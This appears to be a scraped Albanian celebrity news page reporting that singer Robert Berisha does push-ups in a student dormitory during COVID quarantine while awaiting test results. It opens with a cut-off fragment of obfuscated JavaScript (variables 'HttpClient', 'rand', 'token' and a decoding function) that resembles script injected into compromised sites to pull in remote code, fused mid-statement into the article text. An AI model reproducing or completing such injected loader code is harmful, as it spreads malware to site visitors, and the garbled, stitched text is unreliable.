;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Teksa pret rezultatet e analizës, kështu po e kalon Roberti kohën në konvikt

By

Teksa po afrohen dy javë të karantimit të Robert Berishës në Qendrën e Studentëve pas kthimit nga Amerika, në ditën kur supozohet se do të bëjë testin, Roberti ka ndarë një copëz nga përditshmëria e tij në konvikt.

Ai ka treguar për ndjekësit e tij të shumtë në rrjete sociale se përgjatë kësaj kohe nuk i ka lënë anash për asnjë moment, ushtrimet fizike.

Këngëtari i njohur shihet teksa bën pompa.

‘Të fala nga konvikti numër 8’ – shprehet Roberti në videon e ndarë që ka nxitur reagime edhe nga fytyra të tjera të njohura, mes tyre edhe të Dorina Memës.

Me energjinë dhe aktivitetin fizik sipas parametrave normal, Roberti duket t’i ketë shpëtuar coronavirus-it, ndonëse për t’u siguruar plotësisht që nuk është bartës, duhet pritur rezultatet e analizës. /Prive.al

Artikuj të ngjashëm